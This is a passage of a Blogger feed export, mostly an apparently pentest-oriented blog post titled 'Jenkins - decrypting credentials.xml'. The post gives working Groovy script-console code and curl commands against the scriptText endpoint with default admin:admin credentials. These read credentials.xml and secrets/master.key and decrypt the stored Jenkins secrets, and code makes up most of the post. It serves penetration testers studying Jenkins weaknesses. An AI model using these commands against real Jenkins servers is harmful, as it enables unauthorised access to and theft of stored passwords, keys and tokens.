monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/8575904409576959407\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/8575904409576959407","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8575904409576959407"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8575904409576959407"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/03\/jenkins-identify-ip-addresses-of-nodes.html","title":"Jenkins - Identify IP Addresses of nodes"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEguSdi39W7IQVPRxn7K2eXB-ZnOy0NUQY9ojUe3_qbD31uOk6hZgft2dHwamo-OTP6q3w8YoiUgzVz2bO8LuoFlBtwh7-Akhw5oegYYLfwZry5z7_2IQLHIop65eCYi4hoedRXBm9gPvgI\/s72-c\/Screen+Shot+2019-03-04+at+9.14.23+PM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-7807981096117925435"},"published":{"$t":"2019-02-28T10:22:00.001-05:00"},"updated":{"$t":"2019-04-08T16:34:04.155-04:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - decrypting credentials.xml"},"content":{"type":"html","$t":"\u003Cspan style=\"color: #444444;\"\u003EIf you find yourself on a Jenkins box with script console access you can decrypt the saved passwords in credentials.xml in the following way:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ehashed_pw='$PASSWORDHASH'\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Epasswd = hudson.util.Secret.decrypt(hashed_pw)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eprintln(passwd)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EYou need to perform this on the the Jenkins system itself as it's using the local \u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Emaster.key\u003C\/span\u003E and\u0026nbsp;\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ehudson.util.Secret\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EScreenshot below\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhFkNV99_ybWbNJyDmwPMmSSXQjENMDnE36smHLghTMvOU7s0-NftJevAI7EIfcwPXTvMqT6jfMhLIQ6f_cfbOIBQRj6gTCTBTFayd1fXh36_LT4pMc5t2dXLmBi0PvrRX5yxbYfjF_6_Y\/s1600\/Screen+Shot+2019-02-28+at+9.55.48+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"914\" data-original-width=\"1600\" height=\"364\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhFkNV99_ybWbNJyDmwPMmSSXQjENMDnE36smHLghTMvOU7s0-NftJevAI7EIfcwPXTvMqT6jfMhLIQ6f_cfbOIBQRj6gTCTBTFayd1fXh36_LT4pMc5t2dXLmBi0PvrRX5yxbYfjF_6_Y\/s640\/Screen+Shot+2019-02-28+at+9.55.48+AM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003ECode to get the credentials.xml from the script console\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EWindows\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef sout = new StringBuffer(), serr = new StringBuffer()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef proc = 'cmd.exe \/c type credentials.xml'.execute()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eproc.consumeProcessOutput(sout, serr)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eproc.waitForOrKill(1000)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cspan style=\"color: #444444;\"\u003Eprintln \"out\u0026gt; $sout err\u0026gt; $serr\"\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E*nix\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef sout = new StringBuffer(), serr = new StringBuffer()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef proc = 'cat credentials.xml'.execute()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eproc.consumeProcessOutput(sout, serr)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eproc.waitForOrKill(1000)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cspan style=\"color: #444444;\"\u003Eprintln \"out\u0026gt; $sout err\u0026gt; $serr\"\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgQIHvKbwhDc3MnTLBUNVpJpO-SYFTD9LzT4EI-9F32ceUTTmNFzasq3UhNcROCNsyoaj31MCCjfagBiz7AaA2niGeV67HrTq7Hx-jBX2myMapp9c3Lnafej497JkJy9T5TlaOmcDfAI6w\/s1600\/Screen+Shot+2019-02-28+at+10.02.18+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"840\" data-original-width=\"1566\" height=\"342\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgQIHvKbwhDc3MnTLBUNVpJpO-SYFTD9LzT4EI-9F32ceUTTmNFzasq3UhNcROCNsyoaj31MCCjfagBiz7AaA2niGeV67HrTq7Hx-jBX2myMapp9c3Lnafej497JkJy9T5TlaOmcDfAI6w\/s640\/Screen+Shot+2019-02-28+at+10.02.18+AM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EIf you just want to do it with curl you can hit the scriptText endpoint and do something like this:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003EWindows:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+\/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22\u0026amp;Submit=Run\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EAlso because this syntax took me a minute to figure out for files in subdirectories:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+\/c+type+\u003Cb\u003Es\u003C\/b\u003E\u003Cb\u003Eecrets%5C\\master.key\u003C\/b\u003E%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22\u0026amp;Submit=Run\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E*nix\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22\u0026amp;Submit=Run\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThen to decrypt any passwords:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())\"\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgnJuSqASqUWdvE0oTGOlvRV3iDBonwuY0va3DMBKxzN1yaLRNUvcyWhN9lJWfWyuU53FzGI7uSKMZGp4wRofTjfpvUOgsr2Jfm-a_vD70VT1yLfSq4ezUewTEHrjZhmfFhK8AJOAAkfQ4\/s1600\/Screen+Shot+2019-02-28+at+10.04.59+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"111\" data-original-width=\"1600\" height=\"44\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgnJuSqASqUWdvE0oTGOlvRV3iDBonwuY0va3DMBKxzN1yaLRNUvcyWhN9lJWfWyuU53FzGI7uSKMZGp4wRofTjfpvUOgsr2Jfm-a_vD70VT1yLfSq4ezUewTEHrjZhmfFhK8AJOAAkfQ4\/s640\/Screen+Shot+2019-02-28+at+10.04.59+AM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EIf you are in a position where you have the files but no access to jenkins you can use:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/github.com\/tweksteen\/jenkins-decrypt\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/github.com\/tweksteen\/jenkins-decrypt\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThere is a small bug in the python when it does the regex and i havent bothered to fix it at the time of this post. But here is version where instead of the regex i'm just printing out the values and you can see the decrypted password. The change is line 55.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cscript src=\"https:\/\/gist.github.com\/carnal0wnage\/80611a9c035046b2d400d90303355ff0.js\"\u003E\u003C\/script\u003E\n\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgLuVGgZLrxASVed0FYXj8PJ0a5qEfGetD3qgTAXTTJAdJ97B2zcq0qezPogtYE8vor3hbUSfK2vVIXL688vx5OFU6WX0cc0obWV5cZwUKsfKgWr3sxl427v4pQA1mxWFL2Lxx5O6OkeAQ\/s1600\/Screen+Shot+2019-02-28+at+10.20.54+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"251\" data-original-width=\"1600\" height=\"100\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgLuVGgZLrxASVed0FYXj8PJ0a5qEfGetD3qgTAXTTJAdJ97B2zcq0qezPogtYE8vor3hbUSfK2vVIXL688vx5OFU6WX0cc0obWV5cZwUKsfKgWr3sxl427v4pQA1mxWFL2Lxx5O6OkeAQ\/s640\/Screen+Shot+2019-02-28+at+10.20.54+AM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003EEdit 4 March 19: the script only regexs for password (line 72), you might need to swap out the regex if there are ssh keys or other secrets...read the credentials.xml file :-)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EEdit 8 April 19: This tweet outlines another similar way\u0026nbsp;\u0026nbsp;\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Ca href=\"https:\/\/twitter.com\/netmux\/status\/1115237815590236160\" target=\"_blank\"\u003Ehttps:\/\/twitter.com\/netmux\/status\/1115237815590236160\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cstyle type=\"text\/css\"\u003E\np.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f2f2f2; background-color: #000000}\nspan.s1 {font-variant-ligatures: no-common-ligatures}\n\u003C\/style\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/7807981096117925435\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/7807981096117925435","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/7807981096117925435"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/7807981096117925435"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/02\/jenkins-decrypting-credentialsxml.html","title":"Jenkins - decrypting credentials.xml"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhFkNV99_ybWbNJyDmwPMmSSXQjENMDnE36smHLghTMvOU7s0-NftJevAI7EIfcwPXTvMqT6jfMhLIQ6f_cfbOIBQRj6gTCTBTFayd1fXh36_LT4pMc5t2dXLmBi0PvrRX5yxbYfjF_6_Y\/s72-c\/Screen+Shot+2019-02-28+at+9.55.48+AM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}}]}});